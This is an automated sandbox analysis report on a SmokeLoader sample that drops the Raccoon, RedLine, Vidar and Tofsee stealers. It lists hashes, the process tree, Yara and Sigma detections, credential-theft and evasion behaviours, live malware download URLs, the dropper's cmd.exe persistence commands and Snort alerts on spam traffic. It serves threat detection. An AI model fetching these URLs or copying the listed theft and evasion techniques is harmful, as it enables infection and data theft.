Play interactive tour

Edit tour

Windows Analysis Report 69CDTt1pad.exe

Overview

General Information

Sample Name:	69CDTt1pad.exe
Analysis ID:	470439
MD5:	0102055c5fbd724bf28bc696ca22f06d
SHA1:	254c0c655937c98d415cd67097824d5b0c381329
SHA256:	682ef52e3ab62fc62e75477915bf98a8da2ef787676c0d9dfb05de1875195885
Tags:	DofoilexeSmokeLoader
Infos:
Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader Tofsee Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Vidar

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Yara detected Vidar stealer

Yara detected Tofsee

Sigma detected: Copying Sensitive Files with Credential Data

Maps a DLL or memory area into another process

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Deletes itself after installation

Tries to detect virtualization through RDTSC time measurements

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Changes security center settings (notifications, updates, antivirus, firewall)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Connects to many different domains

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Queries disk information (often used to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

69CDTt1pad.exe (PID: 5304 cmdline: 'C:\Users\user\Desktop\69CDTt1pad.exe' MD5: 0102055C5FBD724BF28BC696CA22F06D)

69CDTt1pad.exe (PID: 3804 cmdline: 'C:\Users\user\Desktop\69CDTt1pad.exe' MD5: 0102055C5FBD724BF28BC696CA22F06D)

explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

AC25.exe (PID: 6288 cmdline: C:\Users\user~1\AppData\Local\Temp\AC25.exe MD5: A69E12607D01237460808FA1709E5E86)

B483.exe (PID: 492 cmdline: C:\Users\user~1\AppData\Local\Temp\B483.exe MD5: C633B1E68DCFFDAE991C3F2D2D4FFFA5)

WerFault.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 492 -s 752 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

C481.exe (PID: 3804 cmdline: C:\Users\user~1\AppData\Local\Temp\C481.exe MD5: 68D5331A8418C4089BB7C0F524C77728)

CA2F.exe (PID: 5820 cmdline: C:\Users\user~1\AppData\Local\Temp\CA2F.exe MD5: BF40705CBA9708182B61956985895005)

D711.exe (PID: 6104 cmdline: C:\Users\user~1\AppData\Local\Temp\D711.exe MD5: 9AA6DD10E0BFB49BAA17F04F44B9DCD3)

conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

E4FD.exe (PID: 5356 cmdline: C:\Users\user~1\AppData\Local\Temp\E4FD.exe MD5: 59C5BECF1794C98CBE8DA8E501F55DA5)

conhost.exe (PID: 2900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

F45F.exe (PID: 1988 cmdline: C:\Users\user~1\AppData\Local\Temp\F45F.exe MD5: DF744C31B1D8DE9790059D2BAC52E2EF)

cmd.exe (PID: 6636 cmdline: 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\dsjnelnu\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7008 cmdline: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user~1\AppData\Local\Temp\revewjlf.exe' C:\Windows\SysWOW64\dsjnelnu\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

explorer.exe (PID: 5404 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 6752 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 5640 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3132 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3608 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5256 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5268 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3800 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 1288 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 1064 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4856 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6160 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6340 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

tvvihsf (PID: 6844 cmdline: C:\Users\user\AppData\Roaming\tvvihsf MD5: 0102055C5FBD724BF28BC696CA22F06D)

tvvihsf (PID: 6892 cmdline: C:\Users\user\AppData\Roaming\tvvihsf MD5: 0102055C5FBD724BF28BC696CA22F06D)

svchost.exe (PID: 5584 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 5872 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 492 -ip 492 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000016.00000002.382323711.00000000005A1000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001F.00000002.488756126.00000000026D4000.00000004.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000027.00000002.479473335.0000000002E30000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000001B.00000000.414147261.00000000047E0000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000027.00000003.438774963.0000000002E50000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000003.00000002.319923484.0000000002061000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001B.00000002.520963245.00000000047E0000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000016.00000002.382285678.0000000000580000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000003.00000002.319622428.0000000000460000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001B.00000000.411422894.00000000047E0000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0000001B.00000000.412569574.000000000046C000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000027.00000002.471628621.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: B483.exe PID: 492	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: C481.exe PID: 3804	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
27.3.B483.exe.4870000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
27.0.B483.exe.47e0e50.2.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
3.1.69CDTt1pad.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
31.2.CA2F.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
31.2.CA2F.exe.40b0e50.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
27.0.B483.exe.47e0e50.4.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
27.0.B483.exe.400000.3.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
27.3.B483.exe.4870000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
3.2.69CDTt1pad.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
31.2.CA2F.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
22.2.tvvihsf.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
27.2.B483.exe.47e0e50.1.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
27.0.B483.exe.400000.1.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
27.0.B483.exe.47e0e50.4.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
31.2.CA2F.exe.40b0e50.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
22.1.tvvihsf.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
27.2.B483.exe.47e0e50.1.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
31.3.CA2F.exe.4150000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
27.0.B483.exe.47e0e50.2.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
31.3.CA2F.exe.4150000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
27.2.B483.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 16 entries

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user~1\AppData\Local\Temp\revewjlf.exe' C:\Windows\SysWOW64\dsjnelnu\, CommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user~1\AppData\Local\Temp\revewjlf.exe' C:\Windows\SysWOW64\dsjnelnu\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\F45F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\F45F.exe, ParentProcessId: 1988, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user~1\AppData\Local\Temp\revewjlf.exe' C:\Windows\SysWOW64\dsjnelnu\, ProcessId: 7008

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 27.3.B483.exe.4870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.B483.exe.4870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.47e0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.47e0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000000.414147261.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.520963245.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.411422894.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.412569574.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B483.exe PID: 492, type: MEMORYSTR

Antivirus detection for URL or domain

Show sources

Source: http://readinglistforaugust3.xyz/	Avira URL Cloud: Label: malware
Source: http://readinglistforaugust3.xyz/reestr.exe	Avira URL Cloud: Label: malware
Source: http://readinglistforaugust3.xyz/raccon.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: 69CDTt1pad.exe	Virustotal: Detection: 41%			Perma Link
Source: 69CDTt1pad.exe	ReversingLabs: Detection: 43%

Machine Learning detection for sample

Show sources

Source: 69CDTt1pad.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D711.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\tvvihsf	Joe Sandbox ML: detected

Source: 31.2.CA2F.exe.40b0e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 31.3.CA2F.exe.4150000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_00420010 __EH_prolog,_strlen,CryptStringToBinaryA,	27_2_00420010
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_00429094 CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,	27_2_00429094
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_00429267 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,	27_2_00429267
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0040EBCB CryptUnprotectData,LocalAlloc,_memmove,LocalFree,	31_2_0040EBCB
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0040E9D0 _memset,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,	31_2_0040E9D0
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0040EB68 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	31_2_0040EB68
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0040ECE2 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,	31_2_0040ECE2

Source: 69CDTt1pad.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\B483.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 74.114.154.22:443 -> 192.168.2.7:49717 version: TLS 1.2

Source:	Binary string: C:\jenilol\fovogoranupiho_bakawol.pdb source: B483.exe, 0000001B.00000000.394575952.0000000000458000.00000002.00020000.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.295408110.000000000FBF0000.00000002.00000001.sdmp
Source:	Binary string: :C:\vala\fotedesoga23\boconadapujeb.pdb source: 69CDTt1pad.exe, 00000001.00000000.238098271.0000000000412000.00000002.00020000.sdmp, 69CDTt1pad.exe, 00000003.00000000.242571758.0000000000412000.00000002.00020000.sdmp, tvvihsf, 00000015.00000002.369968768.0000000000412000.00000002.00020000.sdmp
Source:	Binary string: C:\vala\fotedesoga23\boconadapujeb.pdb source: 69CDTt1pad.exe, 00000001.00000000.238098271.0000000000412000.00000002.00020000.sdmp, 69CDTt1pad.exe, 00000003.00000000.242571758.0000000000412000.00000002.00020000.sdmp, tvvihsf, 00000015.00000002.369968768.0000000000412000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\Alexx\Desktop\QWER\DeviceCredentialDeployment\bin\Release\Secured\ConfigurationStringConstants.pdb source: C481.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.295408110.000000000FBF0000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0040A5EA _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

31_2_0040A5EA

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\

Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_0043E07C FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	27_2_0043E07C
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	31_2_0040A24D
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_004625F7 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	31_2_004625F7
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00412D96 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	31_2_00412D96
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,	31_2_00404F13
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00405A45 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	31_2_00405A45

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49734
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49736
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49735
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49737
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49745
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49746
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49748
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49747
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49749
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49751
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49752
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49750
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49756
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.7:49755
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49757
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49754
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49753
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49760
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.7:49763
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.7:49762
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49759
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49765
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49764
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49767
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49768
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49766
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49770
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49769
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49771
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49774
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49775
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49772
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49773
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49779
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49778
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49776
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49777
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49782
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49783
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49780
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49784
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49781
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49787
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49788
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49790
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.7:49789
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.33:25 -> 192.168.2.7:49785
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49792
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49786
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49793
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49791
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49796
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49797
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49795
